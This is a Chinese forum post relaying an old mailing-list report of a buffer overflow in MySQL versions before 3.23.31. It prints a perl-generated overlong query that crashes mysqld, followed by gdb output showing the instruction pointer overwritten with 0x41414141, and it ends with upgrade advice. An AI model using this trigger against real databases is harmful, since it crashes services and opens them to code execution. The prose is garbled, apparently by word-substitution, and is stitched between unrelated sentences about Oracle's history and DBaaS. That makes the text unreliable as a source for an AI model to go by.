|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
到2009年,甲骨文的数据库Oracle已经诞生了30周年,而MySQL却连它的一半时间都没有。微软的SQLServer仅仅比MySQL大两年,但是SQLServer的发布是建立在Sybase的基础上。一切小于3.23.31版本的MySQL都存在一个缓冲溢露马脚招致MySQL溃散。使打击者取得mysqld权限,而能够利用一切数据库。打击的条件是必需有一个正当的登录名和口令。
上面为最后宣布于MySQL邮件列表的函件择要。
==================================================
毛病是由Jo?oGouveia于1月12日发明的:
步骤:
在第一个终端上启动mysql:
spike:/var/mysql#/sbin/init.d/mysqlstart
在别的一个终端上输出:
jroberto@spike:~>mysql-p-e’selecta.’`perl-e’PRintf("A"x130)’`’.b’
EnterpassWord:
(没有反响?按^C加入)
在第一台终端上会显现:
spike:/var/mysql#/usr/bin/safe_mysqld:line149:15557Segmentationfault
nohup
$ledir/mysqld--basedir=$MY_BASEDIR_VERSION--datadir=$DATADIR--skip-lockin
g"$@">>$err_log2>&1>
Numberofprocessesrunningnow:0
mysqldrestartedonFriJan1207:10:54WET2001
mysqlddaemonended
利用gdb显现了局以下:
(gdb)run
Startingprogram:/usr/sbin/mysqld
[NewThread16897(managerthread)]
[NewThread16891(initialthread)]
[NewThread16898]
/usr/sbin/mysqld:readyforconnections
[NewThread16916]
[SwitchingtoThread16916]
ProgramreceivedsignalSIGSEGV,Segmentationfault.
0x41414141in??()
(gdb)infoall-registers
eax0x11
ecx0x68104
edx0x8166947135686471
ebx0x414141411094795585
esp0xbf5ff4080xbf5ff408
ebp0x414141410x41414141
esi0x414141411094795585
edi0x00
eip0x414141410x41414141
eflags0x1024666118
cs0x2335
ss0x2b43
ds0x2b43
es0x2b43
fs0x00
gs0x00
个中的eip唆使就是缓冲溢出了。
办理举措就是晋级到3.23.31。以是,列位假如还没有把数据库晋级到最新版本,请从速举动。
客户还是可以使用DBaaS系统所能提供的所有能力。数据库云服务消除了组织对专职人员、本地数据库存储设备的需要。他们不必安装、配置和维护任何软硬件。 |
|